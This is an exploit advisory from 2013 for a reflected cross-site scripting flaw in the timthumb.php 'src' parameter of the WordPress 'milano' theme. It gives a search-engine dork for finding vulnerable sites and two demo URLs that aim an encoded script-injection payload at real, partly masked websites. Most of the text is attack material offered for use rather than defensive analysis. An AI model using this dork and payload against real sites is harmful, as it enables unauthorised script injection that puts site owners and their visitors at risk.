WordPress milano Theme Cross Site Scripting

############## 
# Exploit Title : Wordpress milano Theme Cross Site Scripting
# 
# Exploit Author : Ashiyane Digital Security Team 
# 
# Date : 2013 / 05 
# 
# Home : www.Ashiyane.org 
# 
# Security Risk : Medium 
# 
# Dork : inurl:/wp-content/themes/milano/milano/timthumb.php?src=
# 
# Tested on: Linux , Win 7 
# 
############## 
#Location:site/[path]/wp-content/themes/milano/milano/timthumb.php?src=
# 
#DEm0: 
# http://acm.jaXXXana.edu.co/wp-content/themes/milano/milano/timthumb.php?src=%22/%3E%3CScript%3Ealert%28/%20XsseD%20bY%20Alireza666/%29%3C/script%3E
# 
# http://luminXessa.ua/wp-content/themes/milano/milano/timthumb.php?src=%22/%3E%3CScript%3Ealert%28/%20XsseD%20bY%20Alireza666/%29%3C/script%3E
# 
############## 
#Greetz to: My Lord God 
############## 
# 
# Alireza666
# 
##############